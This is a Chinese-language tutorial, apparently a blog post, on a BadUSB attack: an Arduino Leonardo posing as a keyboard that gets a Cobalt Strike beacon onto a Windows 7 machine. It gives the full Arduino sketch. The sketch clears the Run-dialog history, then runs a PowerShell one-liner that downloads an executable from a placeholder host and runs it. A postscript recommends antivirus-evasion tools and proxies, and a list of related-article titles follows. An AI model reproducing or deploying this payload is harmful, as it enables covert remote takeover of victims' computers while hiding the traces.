安全攻防之BadUsb攻击之CS上线
一、环境和准备
1.win7 X64系统
2.arduino Leonardo板子一块
3.cs4.4服务器(Linux已经启动CS并配置好监听器,本文不做讨论,感兴趣的自行百度)
win7安装好Leonardo板子驱动,后显示结果如下
Com3端口,烧录时候会用到;
HID编译工具,arduino-1.5.5-r2,
二、编译和上传代码到Leonardo板子
将Leonardo板子插入电脑,安装完驱动后选择好对应的板子和对应的Com口,如下。
将下面代码复制进去;
void setup() {//初始化Keyboard.begin();//开始键盘通讯 delay(5000);//延时Keyboard.press(KEY_LEFT_GUI);//win键 delay(500); Keyboard.press('r');//r键 delay(500); Keyboard.release(KEY_LEFT_GUI);Keyboard.release('r');delay(500); Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1® delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f");delay(500); Keyboard.println("powershell -Command $clnt = new-object System.Net.WebClient;$url= 'http://www.youwebXXX.com/test.exe';$file = ' C:\\test.exe ';$clnt.DownloadFile($url,$file);"); delay(3000);Keyboard.println("c:\\test.exe&exit");Keyboard.end();//结束键盘通讯
}
void loop()//循环
{
}
自行修改一下: $url= 'http://www.youwebXXX.com/test.exe',直接点击上传。
上传成功,Leonardo板子会自行弹出。
三、测试CS,打开客户端CS
插入后自动运行Powershell代码并成功上线CS。
后记:exe文件或者ps最好做免杀
免杀推荐摧日cuiri和foureye,推荐挂代理
Cuiri免杀绕过:https://github.com/NyDubh3/CuiRi
https://github.com/lengjibo/FourEye
安全攻防之BadUsb攻击之CS上线相关推荐
- 使用kali nethunter执行badUSB攻击--基于Rucky工具
使用kali nethunter执行badUSB攻击–基于Rucky工具 1.下载工具 从F-Droid商店下载Rucky工具 2.攻击语言语法介绍 参考up主无序熵增进行整理:https://www ...
- powershell cs上线_BasUSB实现后台静默执行上线CobaltStrike
点击上方蓝字 关注我们吧 #0x01 缘由 继上次K师傅的投稿:BadUSB简单免杀一秒上线CobaltStrike 大概执行步骤:WIN+R >> CMD打开POWERSHELL &g ...
- 内网渗透-cobaltstrike之cs上线获取shell
cobaltstrike之cs上线获取shell 文章目录 cobaltstrike之cs上线获取shell 前言 一.什么是cobaltstrike 二.cs上线获取shell 1.环境搭建 CS安 ...
- powershell cs上线_红队CS工具的基本使用
简介: Cobalt Strike 一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端口转发.服务扫描,自动化溢出,多模式端口监听,exe.powershell木马生成等. 还可以进 ...
- CS上线Linux--坑太多了
CS上线Linux–坑太多了 文章目录 CS上线Linux--坑太多了 1.1 前期准备 1.2 安装 1.3 反弹shell 传统的Cs只能上线windows,而有时为了方便想将Linux主机上线到 ...
- 『Kali nethunter系列』手机发起“badUSB”攻击(Rucky,Rucky脚本)
一个数据线,一个手机,动动手指拿下电脑控制权. 『Kali nethunter系列』手机发起"badUSB"攻击(Rucky,Rucky脚本) 当然不是只有nethunter的设备 ...
- Badusb 攻击之MacOSX系统实战
Badusb 已经出现了很多年,使用usb进行攻击的手段也从最初的利用autorun.inf.伪造文件夹名.快捷方式等手段转为更加难以防御的Badusb.这种攻击方式就是目前可绕过杀毒软件,防御较难. ...
- shellcode免杀;CS上线;获取微信聊天记录
获取被控端微信聊天记录参考: https://mp.weixin.qq.com/s/4DbXOS5jDjJzM2PN0Mp2JA 微信取证工具(随时更新,随时关注): https://github.c ...
- 攻防演练中攻击队攻击的必备能力
蓝队攻击的必备能力 开展网络渗透对蓝队人员的岗位技能和动手能力都有较高的要 求,这些能力要求侧重于攻防实战,是蓝队人员综合能力水平的体 现.因为蓝队人员在实战攻防演练中面对的是十分契合真实网络条件 的 ...
- 什么是BadUSB攻击以及如何预防
BadUSB 攻击是指 USB 设备存在内置固件漏洞,该漏洞允许自身伪装成人机接口设备.一旦连接到其目标计算机,BadUSB 就可以谨慎地执行有害命令或注入恶意负载. 一种常见的BadUSB攻击类型是 ...
最新文章
- 网站精准定位从这三方面着手
- centos7 搭建vsftpd服务并锁定用户的家目录
- see rebel case 无法越狱_周星驰为什么不拍喜剧,王晶:年纪大了,无法面对自己...
- 关于郭安定 - 了解我更多
- php时间缀签名函数,php时间缀签名函数
- 翁恺老师C语言学习笔记(十)指针_指针运算
- 百度网盘破解版Pandownload开发者被抓
- Windows python pip换源不生效(window11系统),以及pip下载库包报错 because normal site-packages is not writeable
- html5转换成mp4,ffmpeg将mov文件转换为mp4的HTML5视频标签IE9
- 兜兜转转 - 2019开启CSDN博客的新篇章
- 【React】报错:Error: Element type is invalid: expected a string (for built-in components) or a class/fun
- vue文件下载及重命名
- java sortmap分析_Java编程中的SortedMap接口
- LeetCode:606.根据二叉树创建字符串
- Custom Resource Definitions Operator
- css实现液晶字体效果
- 一、Excel基础操作
- 计算机2010版本怎么样的,cad2010版本使用起来怎么样
- 数学建模——公式编辑技巧
- 为什么要使用:需求管理工具——DOORS